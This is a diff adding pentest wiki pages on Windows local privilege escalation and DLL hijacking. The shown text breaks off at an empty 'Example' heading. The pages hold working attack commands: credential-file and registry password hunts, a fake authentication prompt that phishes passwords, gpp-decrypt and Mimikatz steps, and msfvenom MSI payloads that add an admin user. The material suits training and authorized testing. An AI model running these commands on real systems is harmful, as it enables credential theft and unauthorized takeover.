+        if( $DataTable.rows.Count -gt 0 ) {
+            # Display results in list view that can feed into the pipeline
+            $DataTable |  Sort-Object type,user,pass,vdir,apppool | Select-Object user,pass,type,vdir,apppool -Unique
+        }
+        else {
+            # Status user
+            Write-Verbose 'No application pool or virtual directory passwords were found.'
+            $False
+        }
+    }
+    else {
+        Write-Verbose 'Appcmd.exe does not exist in the default location.'
+        $False
+    }
+    $ErrorActionPreference = $OrigError
+}
+```
+
+### SSH keys in registry
+
+SSH private keys can be stored inside the registry key `HKCU\Software\OpenSSH\Agent\Keys`  so you should check if there is anything interesting in there:
+
+```text
+reg query HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys
+```
+
+If you find any entry inside that path it will probably be a saved SSH key. It is stored encrypted but can be easily decrypted using [https://github.com/ropnop/windows\_sshagent\_extract](https://github.com/ropnop/windows_sshagent_extract).
+
+More information about this technique here: [https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/](https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/)
+
+### SCClient / SCCM
+
+Check if `C:\Windows\CCM\SCClient.exe` exists .  
+Installers are **run with SYSTEM privileges**, many are vulnerable to **DLL Sideloading \(Info from** [**https://github.com/enjoiz/Privesc**](https://github.com/enjoiz/Privesc)**\).**
+
+```text
+$result = Get-WmiObject -Namespace "root\ccm\clientSDK" -Class CCM_Application -Property * | select Name,SoftwareVersion
+if ($result) { $result }
+else { Write "Not Installed." }
+```
+
+### **Remote Desktop Credential Manager**
+
+```text
+%localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings
+```
+
+Use the **Mimikatz** `dpapi::rd`g module with appropriate `/masterkey` to **decrypt any .rdg files**  
+You can **extract many DPAPI masterkeys** from memory with the Mimikatz `sekurlsa::dpapi` module
+
+### Ask for credentials
+
+You can always **ask the user to enter his credentials of even the credentials of a different user** if you think he can know them \(notice that **asking** the client directly for the **credentials** is really **risky**\):
+
+```text
+$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password
+$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+'anotherusername',[Environment]::UserDomainName); $cred.getnetworkcredential().password
+```
+
+### Common files with credentials
+
+#### Unattended files
+
+```text
+C:\Windows\sysprep\sysprep.xml
+C:\Windows\sysprep\sysprep.inf
+C:\Windows\sysprep.inf
+C:\Windows\Panther\Unattended.xml
+C:\Windows\Panther\Unattend.xml
+C:\Windows\Panther\Unattend\Unattend.xml
+C:\Windows\Panther\Unattend\Unattended.xml
+C:\Windows\System32\Sysprep\unattend.xml
+C:\Windows\System32\Sysprep\unattended.xml
+C:\unattend.txt
+C:\unattend.inf
+```
+
+#### SAM & SYSTEM backups
+
+```text
+C:\Windows\repair\SAM
+C:\Windows\System32\config\RegBack\SAM
+C:\Windows\System32\config\SAM
+C:\Windows\repair\SYSTEM
+C:\Windows\System32\config\SYSTEM
+C:\Windows\System32\config\RegBack\SYSTEM
+```
+
+#### McAffe SiteList.xml
+
+Search for a file called **SiteList.xml**
+
+#### Cached GPP Pasword
+
+Before KB2928120 \(see MS14-025\), some Group Policy Preferences could be configured with a custom account. This feature was mainly used to deploy a custom local administrator account on a group of machines. There were two problems with this approach though. First, since the Group Policy Objects are stored as XML files in SYSVOL, any domain user can read them. The second problem is that the password set in these GPPs is AES256-encrypted with a default key, which is publicly documented. This means that any authenticated user could potentially access very sensitive data and elevate their privileges on their machine or even the domain. This function will check whether any locally cached GPP file contains a non-empty "cpassword" field. If so, it will decrypt it and return a custom PS object containing some information about the GPP along with the location of the file.
+
+Search in ****_**C:\ProgramData\Microsoft\Group Policy\history**_  or in _**C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history** \(previous to W Vista\)_ for these files:
+
+* Groups.xml
+* Services.xml
+* Scheduledtasks.xml
+* DataSources.xml
+* Printers.xml
+* Drives.xml
+
+**To decrypt the cPassword:**
+
+```bash
+#To decrypt these passwords you can decrypt it using
+gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw
+```
+
+#### Cloud Credentials
+
+```bash
+##From user home
+.aws\credentials
+AppData\Roaming\gcloud\credentials.db
+AppData\Roaming\gcloud\legacy_credentials
+AppData\Roaming\gcloud\access_tokens.db
+.azure\accessTokens.json
+.azure\azureProfile.json
+```
+
+### More possible files with credentials
+
+Known files that some time ago contained **passwords** in **clear-text** or **Base64**
+
+```text
+$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history
+vnc.ini, ultravnc.ini, *vnc*
+web.config
+php.ini httpd.conf httpd-xampp.conf my.ini my.cnf (XAMPP, Apache, PHP)
+SiteList.xml #McAfee
+ConsoleHost_history.txt #PS-History
+*.gpg
+*.pgp
+*config*.php
+elasticsearch.y*ml
+kibana.y*ml
+*.p12
+*.der
+*.csr
+*.cer
+known_hosts
+id_rsa
+id_dsa
+*.ovpn
+anaconda-ks.cfg
+hostapd.conf
+rsyncd.conf
+cesi.conf
+supervisord.conf
+tomcat-users.xml
+*.kdbx
+KeePass.config
+Ntds.dit
+SAM
+SYSTEM
+FreeSSHDservice.ini
+access.log
+error.log
+server.xml
+ConsoleHost_history.txt
+setupinfo
+setupinfo.bak
+key3.db         #Firefox
+key4.db         #Firefox
+places.sqlite   #Firefox
+"Login Data"    #Chrome
+Cookies         #Chrome
+Bookmarks       #Chrome
+History         #Chrome
+TypedURLsTime   #IE
+TypedURLs       #IE
+appcmd.exe
+```
+
+Example of web.config with credentials:
+
+```markup
+<authentication mode="Forms"> 
+    <forms name="login" loginUrl="/admin">
+        <credentials passwordFormat = "Clear">
+            <user name="Administrator" password="SuperAdminPassword" />
+        </credentials>
+    </forms>
+</authentication>
+```
+
+Search all of the proposed files:
+
+```text
+cd C:\
+dir /s/b /A:-D RDCMan.settings == *.rdg == SCClient.exe == *_history == .sudo_as_admin_successful == .profile == *bashrc == httpd.conf == *.plan == .htpasswd == .git-credentials == *.rhosts == hosts.equiv == Dockerfile == docker-compose.yml == appcmd.exe == TypedURLs == TypedURLsTime == History == Bookmarks == Cookies == "Login Data" == places.sqlite == key3.db == key4.db == credentials == credentials.db == access_tokens.db == accessTokens.json == legacy_credentials == azureProfile.json == unattend.txt == access.log == error.log == *.gpg == *.pgp == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12 == *.der == *.csr == *.cer == known_hosts == id_rsa == id_dsa == *.ovpn == anaconda-ks.cfg == hostapd.conf == rsyncd.conf == cesi.conf == supervisord.conf == tomcat-users.xml == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == unattend.xml == unattended.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == groups.xml == services.xml == scheduledtasks.xml == printers.xml == drives.xml == datasources.xml == php.ini == https.conf == https-xampp.conf == httpd.conf == my.ini == my.cnf == access.log == error.log == server.xml == SiteList.xml == ConsoleHost_history.txt == setupinfo == setupinfo.bak 2>nul | findstr /v ".dll"
+```
+
+```text
+Get-Childitem –Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")}
+```
+
+If the server is a IIS server, check the contents of the folder
+
+```text
+Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
+Get-Childitem –Path C:\xampp\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
+```
+
+Check Logs \(IIS, Apache\)
+
+```bash
+# IIS
+C:\inetpub\logs\LogFiles\*
+
+#Apache
+Get-Childitem –Path C:\ -Include access.log,error.log -File -Recurse -ErrorAction SilentlyContinue
+```
+
+It is also a good idea to search for **files** that contain specific words \(like _password_\)
+
+```bash
+#Search suspicious files from filename
+dir /s /W *pass* == *cred* == *vnc* == *.config* | findstr /i/v "\\windows"
+
+#Search suspicious files from content
+findstr /D:C:\ /si password *.xml *.ini *.txt #A lot of output can be generated
+findstr /D:C:\ /M /SI password *.xml *.ini *.txt 2>nul | findstr /V /I "\\AppData\\Local \\WinXsX ApnDatabase.xml \\UEV\\InboxTemplates \\Microsoft.Windows.CloudExperienceHost" 2>nul #filtered output
+```
+
+_**post/windows/gather/credentials/\*  
+post/windows/gather/enum\_unattend**_
+
+#### Home credentials files
+
+You should also look inside the home folder for files called _\*password\*_ or _\*credential\*_ ot something similar.
+
+#### Credentials in the RecycleBin
+
+You should also check the Bin to look for credentials inside it
+
+To **recover passwords** saved by several programs you can use: [http://www.nirsoft.net/password\_recovery\_tools.html](http://www.nirsoft.net/password_recovery_tools.html)
+
+### Inside the registry
+
+#### Winlogon credentials
+
+```bash
+reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"
+```
+
+#### Other possible registry keys with credentials
+
+```bash
+reg query "HKCU\Software\ORL\WinVNC3\Password"
+reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" #Autologin
+reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s
+reg query "HKCU\Software\TightVNC\Server"
+reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s #Check the values saved in each session, user/password could be there
+reg query "HKCU\Software\OpenSSH\Agent\Key"
+
+# Search for passwords inside all the registry 
+reg query HKLM /f password /t REG_SZ /s #Look for registries that contains "password"
+reg query HKCU /f password /t REG_SZ /s #Look for registries that contains "password"
+```
+
+[Extract openssh keys from registry.](https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/)
+
+The tool [SessionGopher](https://github.com/Arvanaghi/SessionGopher) search for **sessions**, **usernames** and **passwords** of several tools that save this data in clear text \(PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP\)
+
+```text
+Invoke-SessionGopher -Thorough
+```
+
+### Browsers History
+
+You should check for dbs where passwords from **Chrome or Firefox** are stored.  
+Also check for the history, bookmarks and favourites of the browsers so maybe some **passwords are** stored there.
+
+Tools to extract passwords from browsers:
+
+* Mimikatz: `dpapi::chrome`
+* [**SharpWeb**](https://github.com/djhohnstein/SharpWeb)\*\*\*\*
+
+## AlwaysInstallElevated
+
+**If** these 2 registers are **enabled** \(value is **0x1**\), then users of any privilege can **install** \(execute\) **`*.msi`** files as NT AUTHORITY\**SYSTEM**.
+
+```bash
+reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
+reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
+```
+
+### Metasploit payloads
+
+```bash
+msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi #No uac format
+msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi #Using the msiexec the uac wont be prompted
+```
+
+### MSI Wrapper
+
+Read this tutorial to learn how to create a MSI wrapper using this tools:
+
+{% page-ref page="msi-wrapper.md" %}
+
+### MSI Installation
+
+To execute the **installation** of the **malicious `.msi`** file in **background:**
+
+```text
+msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\alwe.msi
+```
+
+To exploit this vulnerability you can use: _exploit/windows/local/always\_install\_elevated_
+
+## WSUS
+
+You can compromise the system if the updates are not requested using http**S** but http.
+
+You start by checking if the network uses a non-SSL WSUS update by running the following:
+
+```text
+reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
+```
+
+If you get a reply such as:
+
+```bash
+HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
+      WUServer    REG_SZ    http://xxxx-updxx.corp.internal.com:8535
+```
+
+And if `HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer` is equals to 1.
+
+Then, **it is exploitable.** If the last registry is equals to 0, then, the WSUS entry will be ignored.
+
+You can use: [Wsuxploit](https://github.com/pimps/wsuxploit) - This is a MiTM weaponized exploit script to inject 'fake' updates into non-SSL WSUS traffic.
+
+{% file src="../../.gitbook/assets/ctx\_wsuspect\_white\_paper \(1\).pdf" %}
+
+## Write Permissions
+
+Check if you can modify some config file to read some special file or if you can modify some binary that is going to be executed by an Administrator account \(schedtasks\).
+
+A way to find weak folder/files permissions in the system is doing:
+
+```bash
+accesschk.exe /accepteula 
+# Find all weak folder permissions per drive.
+accesschk.exe -uwdqs Users c:\
+accesschk.exe -uwdqs "Authenticated Users" c:\
+accesschk.exe -uwdqs "Everyone" c:\
+# Find all weak file permissions per drive.
+accesschk.exe -uwqs Users c:\*.*
+accesschk.exe -uwqs "Authenticated Users" c:\*.*
+accesschk.exe -uwdqs "Everyone" c:\*.*
+```
+
+```bash
+icacls "C:\Program Files\*" 2>nul | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"
+icacls ":\Program Files (x86)\*" 2>nul | findstr "(F) (M) C:\" | findstr ":\ everyone authenticated users todos %username%"
+```
+
+```bash
+Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'Everyone'} } catch {}} 
+
+Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}}
+```
+
+## Leaked Handlers
+
+Imagine that **a process running as SYSTEM open a new process** \(`OpenProcess()`\) with **full access**. The same process **also create a new process** \(`CreateProcess()`\) **with low privileges but inheriting all the open handles of the main process**.  
+Then, if you have **full access to the low privileged process**, you can grab the **open handle to the privileged process created** with `OpenProcess()` and **inject a shellcode**.   
+[Read this example for more information about **how to detect and exploit this vulnerability**.](leaked-handle-exploitation.md)  
+[Read this **other post for a more complete explanation on how to test and abuse more open handlers of processes and threads inherited with different levels of permissions \(not only full access\)**](http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/).
+
+## Named Pipe Client Impersonation
+
+A `pipe` is a block of shared memory that processes can use for communication and data exchange.
+
+`Named Pipes` is a Windows mechanism that enables two unrelated processes to exchange data between themselves, even if the processes are located on two different networks. It's very similar to client/server architecture as notions such as `a named pipe server` and a named `pipe client` exist.
+
+When a **client writes on a pipe**, the **server** that created the pipe can **impersonate** the **client** if it has **SeImpersonate** privileges. Then, if you can find a **privileged process if going to write on any pipe that you can impersonate**, you could be able to **escalate privileges** impersonating that process after it writes inside your created pipe. [**You can read this to learn how to perform this attack**](named-pipe-client-impersonation.md)**.**
+
+## From Administrator Medium to High Integrity Level / UAC Bypass
+
+\*\*\*\*[**Learn here**](../credentials.md#uac) **about what are the "integrity levels" in Windows, what is UAC and how to**[ **bypass it**](../credentials.md#uac)**.**
+
+## **From High Integrity to System**
+
+### **New service**
+
+If you are already running on a High Integrity process, the **pass to SYSTEM** can be easy just **creating and executing a new service**:
+
+```text
+sc create newservicename binPath= "C:\windows\system32\notepad.exe"
+sc start newservicename
+```
+
+### AlwaysInstallElevated
+
+From a High Integrity process you could try to e**nable the AlwaysInstallElevated registry entries** and **install** a reverse shell using a _**.msi**_ wrapper.   
+[More information about the registry keys involved and how to install a _.msi_ package here.](./#alwaysinstallelevated)
+
+### From SeDebug + SeImpersonate to Full Token privileges
+
+If you have those token privileges \(probably you will find this in an already High Integrity process\), you will be able to **open almost any process** \(not protected processes\) with the SeDebug privilege, **copy the token** of the process, and create an **arbitrary process with that token**.  
+Using this technique is usually **selected any process running as SYSTEM with all the token privileges** \(_yes, you can find SYSTEM processes without all the token privileges_\).  
+**You can find an** [**example of code executing the proposed technique here**](sedebug-+-seimpersonate-copy-token.md)**.**
+
+### **Named Pipes**
+
+This technique is used by meterpreter to escalate in `getsystem`. The technique consists on **creating a pipe and then create/abuse a service to write on that pipe**. Then, the **server** that created the pipe using the **`SeImpersonate`** privilege will be able to **impersonate the token** of the pipe client \(the service\) obtaining SYSTEM privileges.  
+If you want to [**learn more about name pipes you should read this**](./#named-pipe-client-impersonation).  
+If you want to read an example of [**how to go from high integrity to System using name pipes you should read this**](from-high-integrity-to-system-with-name-pipes.md).
+
+### Dll Hijacking
+
+If you manages to **hijack a dll** being **loaded** by a **process** running as **SYSTEM** you will be able to execute arbitrary code with those permissions. Therefore Dll Hijacking is also useful to this kind of privilege escalation, and, moreover, if far **more easy to achieve from a high integrity process** as it will have **write permissions** on the folders used to load dlls.  
+**You can** [**learn more about Dll hijacking here**](dll-hijacking.md)**.**
+
+## More help
+
+[Static impacket binaries](https://github.com/ropnop/impacket_static_binaries)
+
+## Useful tools
+
+#### **Best tool to look for Windows local privilege escalation vectors:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)\*\*\*\*
+
+#### PS
+
+\*\*\*\*[**PowerSploit-Privesc\(PowerUP\)**](https://github.com/PowerShellMafia/PowerSploit) -- Check for misconfigurations and sensitive files \([check here]()\). Detected.  
+[**JAWS**](https://github.com/411Hall/JAWS) ****-- Check for some possible misconfigurations and gather info \([check here]()\).  
+[**privesc** ](https://github.com/enjoiz/Privesc)-- Check for misconfigurations  
+[**SessionGopher**](https://github.com/Arvanaghi/SessionGopher) ****-- It extracts PuTTY, WinSCP, SuperPuTTY, FileZilla, and RDP saved session information. Use **-Thorough** in local.  
+[**Invoke-WCMDump**](https://github.com/peewpw/Invoke-WCMDump) ****-- Extracts crendentials from Credential Manager. Detected.  
+[**DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray) ****-- Spray gathered passwords across domain  
+[**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) ****-- Inveigh is a PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool.  
+[~~**Sherlock**~~](https://github.com/rasta-mouse/Sherlock)  ~~****~~-- Search for known privesc vulnerabilities \(DEPRECATED for Watson\)  
+[~~**WINspect**~~](https://github.com/A-mIn3/WINspect) ~~****~~-- Local checks **\(Need Admin rights\)**
+
+#### Exe
+
+[**Watson**](https://github.com/rasta-mouse/Watson) ****-- Search for known privesc vulnerabilities \(needs to be compiled using VisualStudio\) \([**precompiled**](https://github.com/carlospolop/winPE/tree/master/binaries/watson)\)  
+[**SeatBelt**](https://github.com/GhostPack/Seatbelt) ****-- Enumerates the host searching for misconfigurations \(more a gather info tool than privesc\) \(needs to be compiled\) **\(**[**precompiled**](https://github.com/carlospolop/winPE/tree/master/binaries/seatbelt)**\)**  
+[**LaZagne**](https://github.com/AlessandroZ/LaZagne) ****-- Extracts credentials from lots of softwares \(precompiled exe in github\)  
+[~~**Beroot**~~](https://github.com/AlessandroZ/BeRoot) ~~****~~-- Check for misconfiguration \(executable precompiled in github\). Not recommended. It does not works well in Win10.  
+[~~**Windows-Privesc-Check**~~](https://github.com/pentestmonkey/windows-privesc-check) -- Check for possible misconfigurations \(exe from python\). Not recommended. It does not works well in Win10.
+
+#### Bat
+
+\*\*\*\*[**winPEASbat** ](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)-- Tool created based in this post \(it does not need accesschk to work properly but it can use it\).
+
+#### Local
+
+[**Windows-Exploit-Suggester**](https://github.com/GDSSecurity/Windows-Exploit-Suggester) -- Reads the output of **systeminfo** and recommends working exploits \(local python\)  
+[**Windows Exploit Suggester Next Generation**](https://github.com/bitsadmin/wesng) -- Reads the output of **systeminfo** andrecommends working exploits \(local python\)
+
+#### Meterpreter
+
+_multi/recon/local\_exploit\_suggestor_
+
+You have to compile the project using the correct version of .NET \([see this](https://rastamouse.me/2018/09/a-lesson-in-.net-framework-versions/)\). To see the installed version of .NET on the victim host you can do:
+
+```text
+C:\Windows\microsoft.net\framework\v4.0.30319\MSBuild.exe -version #Compile the code with the version given in "Build Engine version" line
+```
+
+## Bibliography
+
+[http://www.fuzzysecurity.com/tutorials/16.html](http://www.fuzzysecurity.com/tutorials/16.html)  
+[http://www.greyhathacker.net/?p=738](http://www.greyhathacker.net/?p=738)  
+[http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html](http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html)  
+[https://github.com/sagishahar/lpeworkshop](https://github.com/sagishahar/lpeworkshop)  
+[https://www.youtube.com/watch?v=\_8xJaaQlpBo](https://www.youtube.com/watch?v=_8xJaaQlpBo)  
+[https://sushant747.gitbooks.io/total-oscp-guide/privilege\_escalation\_windows.html](https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html)  
+[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md)  
+[https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)  
+[https://github.com/netbiosX/Checklists/blob/master/Windows-Privilege-Escalation.md](https://github.com/netbiosX/Checklists/blob/master/Windows-Privilege-Escalation.md)  
+[https://github.com/frizb/Windows-Privilege-Escalation](https://github.com/frizb/Windows-Privilege-Escalation)  
+[https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/](https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/)  
+[https://github.com/frizb/Windows-Privilege-Escalation](https://github.com/frizb/Windows-Privilege-Escalation)  
+[http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html](http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html)
+
diff --git a/windows/windows-local-privilege-escalation/dll-hijacking.md b/windows/windows-local-privilege-escalation/dll-hijacking.md
new file mode 100644
index 00000000..bb293e26
--- /dev/null
+++ b/windows/windows-local-privilege-escalation/dll-hijacking.md
@@ -0,0 +1,201 @@
+# Dll Hijacking
+
+## Definition
+
+First of all, let’s get the definition out of the way. DLL hijacking is, in the broadest sense, **tricking a legitimate/trusted application into loading an arbitrary DLL**. Terms such as _DLL Search Order Hijacking_, _DLL Load Order Hijacking_, _DLL Spoofing_, _DLL Injection_ and _DLL Side-Loading_ are often -mistakenly- used to say the same.
+
+Dll hijacking can be used to **execute** code, obtain **persistence** and **escalate privileges**. From those 3 the **least probable** to find is **privilege escalation** by far. However, as this is part of the privilege escalation section, I will focus on this option. Also, note that independently of the goal, a dll hijacking is perform the in the same way.
+
+### Types
+
+There is a **variety of approaches** to choose from, with success depending on how the application is configured to load its required DLLs. Possible approaches include:
+
+1. **DLL replacement**: replace a legitimate DLL with an evil DLL. This can be combined with _DLL Proxying_ \[[2](https://kevinalmansa.github.io/application%20security/DLL-Proxying/)\], which ensures all functionality of the original DLL remains intact.
+2. **DLL search order hijacking**: DLLs specified by an application without a path are searched for in fixed locations in a specific order \[[3](https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order)\]. Hijacking the search order takes place by putting the evil DLL in a location that is searched in before the actual DLL. This sometimes includes the working directory of the target application.
+3. **Phantom DLL hijacking**: drop an evil DLL in place of a missing/non-existing DLL that a legitimate application tries to load \[[4](http://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/)\].
+4. **DLL redirection**: change the location in which the DLL is searched for, e.g. by editing the `%PATH%` environment variable, or `.exe.manifest` / `.exe.local` files to include the folder containing the evil DLL \[[5](https://docs.microsoft.com/en-gb/windows/win32/sbscs/application-manifests), [6](https://docs.microsoft.com/en-gb/windows/win32/dlls/dynamic-link-library-redirection)\] .
+5. **WinSxS DLL replacement**: replace the legitimate DLL with the evil DLL in the relevant WinSxS folder of the targeted DLL. Often referred to as DLL side-loading \[[7](https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf)\].
+6. **Relative path DLL Hijacking:** copy \(and optionally rename\) the legitimate application to a user-writeable folder, alongside the evil DLL. In the way this is used, it has similarities with \(Signed\) Binary Proxy Execution \[[8](https://attack.mitre.org/techniques/T1218/)\]. A variation of this is \(somewhat oxymoronically called\) ‘_bring your own LOLbin_’ \[[9](https://www.microsoft.com/security/blog/2019/09/26/bring-your-own-lolbin-multi-stage-fileless-nodersok-campaign-delivers-rare-node-js-based-malware/)\] in which the legitimate application is brought with the evil DLL \(rather than copied from the legitimate location on the victim’s machine\).
+
+## Finding missing Dlls
+
+The most common way to find missing Dlls inside a system is running [procmon](https://docs.microsoft.com/en-us/sysinternals/downloads/procmon) from sysinternals, **setting** the **following 2 filters**:
+
+![](../../.gitbook/assets/image%20%28292%29.png)
+
+![](../../.gitbook/assets/image%20%28147%29.png)
+
+and just show the **File System Activity**:
+
+![](../../.gitbook/assets/image%20%2896%29.png)
+
+If you are looking for **missing dlls in general** you **leave** this running for some **seconds**.  
+If you are looking for a **missing dll inside an specific executable** you should set **another filter like "Process Name" "contains" "&lt;exec name&gt;", execute it, and stop capturing events**.
+
+## Exploiting Missing Dlls
+
+In order to escalate privileges, the best chance we have is to be able to **write a dll that a privilege process will try to load** in some of **place where it is going to be searched**. Therefore, we will be able to **write** a dll in a **folder** where the **dll is searched before** the folder where the **original dll** is \(weird case\), or we will be able to **write on some folder where the dll is going to be searched** and the original **dll doesn't exist** on any folder.
+
+### Dll Search Order
+
+**Inside the** [**Microsoft documentation**](https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order#factors-that-affect-searching) **you can find how the Dlls are loaded specifically.**
+
+In general, a **Windows application** will use **pre-defined search paths to find DLL's** and it will check these paths in a specific order. DLL hijacking usually happens by placing a malicious DLL in one of these folders while making sure that DLL is found before the legitimate one. This problem can be mitigated by having the application specify absolute paths to the DLL's that it needs.
+
+You can see the **DLL search order on 32-bit** systems below:
+
+1. The directory from which the application loaded.
+2. The system directory. Use the [**GetSystemDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getsystemdirectorya) function to get the path of this directory.\(_C:\Windows\System32_\)
+3. The 16-bit system directory. There is no function that obtains the path of this directory, but it is searched. \(_C:\Windows\System_\)
+4. The Windows directory. Use the [**GetWindowsDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getwindowsdirectorya) function to get the path of this directory. 
+   1. \(_C:\Windows_\)
+5. The current directory.
+6. The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the **App Paths** registry key. The **App Paths** key is not used when computing the DLL search path.
+
+That is the **default** search order with **SafeDllSearchMode** enabled. When it's disabled the current directory escalates to second place. To disable this feature, create the **HKEY\_LOCAL\_MACHINE\System\CurrentControlSet\Control\Session Manager**\**SafeDllSearchMode** registry value and set it to 0 \(default is enabled\).
+
+If [**LoadLibraryEx**](https://docs.microsoft.com/en-us/windows/desktop/api/LibLoaderAPI/nf-libloaderapi-loadlibraryexa) function is called with **LOAD\_WITH\_ALTERED\_SEARCH\_PATH** the search begins in the directory of the executable module that **LoadLibraryEx** is loading.
+
+Finally, note that **a dll could be loaded indicating the absolute path instead just the name**. In that case that dll is **only going to be searched in that path** \(if the dll has any dependencies, they are going to be searched as just loaded by name\).
+
+There are other ways to alter the ways to alter the search order but I'm not going to explain them here.
+
+#### Exceptions on dll search order from Windows docs
+
+* If a **DLL with the same module name is already loaded in memory**, the system checks only for redirection and a manifest before resolving to the loaded DLL, no matter which directory it is in. **The system does not search for the DLL**.
+* If the DLL is on the list of **known DLLs** for the version of Windows on which the application is running, the **system uses its copy of the known DLL** \(and the known DLL's dependent DLLs, if any\) **instead of searching** for the DLL. For a list of known DLLs on the current system, see the following registry key: **HKEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs**.
+* If a **DLL has dependencies**, the system **searches** for the dependent DLLs as if they were loaded with just their **module names**. This is true **even if the first DLL was loaded by specifying a full path**.
+
+### Escalating Privileges
+
+**Requisites**:
+
+* **Find a process** that runs/will run as with **other privileges** \(horizontal/lateral movement\) that is **missing a dll.**
+* Have **write permission** on any **folder** where the **dll** is going to be **searched** \(probably the executable directory or some folder inside the system path\).
+
+Yeah, the requisites are complicated to find as **by default it's kind of weird to find a privileged executable missing a dll** and it's even **more weird to have write permissions on a system path folder** \(you can't by default\). But, in misconfigured environments this is possible.  
+In the case you are lucky and you find yourself meeting the requirements, you could check the [UACME](https://github.com/hfiref0x/UACME) project. Even if the **main goal of the project is bypass UAC**, you may find there a **PoC** of a Dll hijaking for the Windows version that you can use \(probably just changing the path of the folder where you have write permissions\).
+
+Note that you can **check your permissions in a folder** doing:
+
+```bash
+accesschk.exe -dqv "C:\Python27"
+icacls "C:\Python27"
+```
+
+And **check permissions of all folders inside PATH**:
+
+```bash
+for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. )
+```
+
+You can also check the imports of an executable and the exports of a dll with:
+
+```c
+dumpbin /imports C:\path\Tools\putty\Putty.exe
+dumpbin /export /path/file.dll
+```
+
+### Automated tools
+
+[**Winpeas** ](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)will check if you have write permissions on any folder inside system PATH.  
+Other interesting automated tools to discover this vulnerability are **PowerSploit functions**: _Find-ProcessDLLHijack_, _Find-PathDLLHijack_ and _Write-HijackDll._
+
+### Example
+
